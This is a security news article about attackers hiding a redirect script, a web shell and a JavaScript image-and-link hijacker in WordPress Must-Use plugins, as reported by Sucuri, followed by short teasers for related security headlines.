The technique was first discovered in February 2025, but its spread rate is continuously growing, and currently attackers abuse MU plugins to run three different types of malicious code.
Must-Use Plugins represent a special type of WordPress plugins that run every time the page is loaded and don’t require activation in the Admin Panel. These PHP files are stored in the wp-content/ directory, are executed automatically, and don’t appear in the Admin Panel on the Plugins page unless the Must-Use filter is selected.
Among other things, such plugins are used to enforce custom security rules across the website, boost performance, dynamically modify variables, etc.
Since MU plugins are executed on every page load and don’t appear in the standard plugin list, they can be used to covertly perform a wide range of malicious operations (e.g. steal credentials, inject malicious code, or modify HTML output).
Sucuri experts discovered three different payloads placed by cybercriminals to the MU-plugins directory:
-
redirect.redirects visitors (excluding bots and logged in admins) to the malicious website updatesnow[.]net that displays a fake browser update prompt to trick the victim into downloading malware;php -
index.is a web shell that acts as a backdoor by downloading and executing PHP code from a GitHub repository; andphp -
custom-js-loader.loads JavaScript that replaces all images on the website with explicit content, hijacks all external links, and opens fraudulent pop-ups instead.php
The most dangerous payload is the web shell since it enables attackers to remotely execute commands on the server, steal data, and deliver subsequent attacks on resource users and visitors.
The other two malware samples are more likely to damage the website’s reputation and its SEO rankings due to suspicious redirects and attempts to install malware on visitors’ computers.
The infection technique used by the malefactors remains unknown yet. Its assumed that the attackers exploit known vulnerabilities in WordPress plugins and themes or weak admin credentials.
2025.01.28 — J-magic backdoor attacked Juniper Networks devices using 'magic packets'
A massive backdoor attack targeting Juniper routers often used as VPN gateways has been uncovered. The devices were attacked by the J-magic malware that…
Full article →
2025.04.08 — Website of Everest ransomware group hacked and defaced
Last weekend, the darknet website of the Everest ransomware group was hacked and went offline. The attackers replaced its content with a sarcastic message: "Don't do crime…
Full article →
2025.02.07 — 768 vulnerabilities were exploited by hackers in 2024
According to VulnCheck, 768 CVEs were registered as exploited in real-life attacks in 2024. This is 20% greater compared to 2023 when hackers exploited 639 vulnerabilities. Interestingly,…
Full article →
2025.02.14 — 12,000 Kerio Control firewalls remain vulnerable to RCE
Security experts report that more than 12,000 GFI Kerio Control firewall instances remain vulnerable to the critical RCE vulnerability CVE-2024-52875, which was fixed…
Full article →
2025.02.12 — 2.8 million IP addresses used to brute-force network devices
The Shadowserver Foundation warns of a massive web login brute-forcing attacks targeting nearly 2.8 million IP addresses per day. Unknown attackers are seeking…
Full article →
2025.01.22 — Fake Homebrew Infects macOS and Linux Machines with infostealer
Attackers use Google ads to disguise themselves as the Homebrew website and distribute malware targeting Mac and Linux systems and stealing logon credentials, browser data, and cryptocurrency wallets.…
Full article →
2025.01.26 — Cisco patched a critical vulnerability in Meeting Management
Cisco released updates to fix a critical (CVSS score: 9.9) vulnerability in Meeting Management. The bug enables an unprivileged remote authenticated attacker to gain administrative privileges. The vulnerability…
Full article →
2025.02.17 — Dutch police seize 127 servers belonging to Zservers hosting provider
Following the introduction of international sanctions against Zservers, Russian 'bulletproof' hosting services provider, the Dutch National Police (Politie) shut down and seized 127 servers belonging to Zservers/XHost.…
Full article →
2025.03.20 — 8,000 vulnerabilities identified in WordPress ecosystem in 2024
According to Patchstack, world's #1 WordPress vulnerability intelligence provider, 7,966 new vulnerabilities were identified in the WordPress ecosystem in 2024; most of these bugs affected plugins…
Full article →
2025.04.15 — Hackers exploit authentication bypass bug in OttoKit WordPress plugin
Hackers exploit an authentication bypass vulnerability in the OttoKit (formerly SureTriggers) WordPress plugin used by more than 100,000 websites. First attacks were recorded just…
Full article →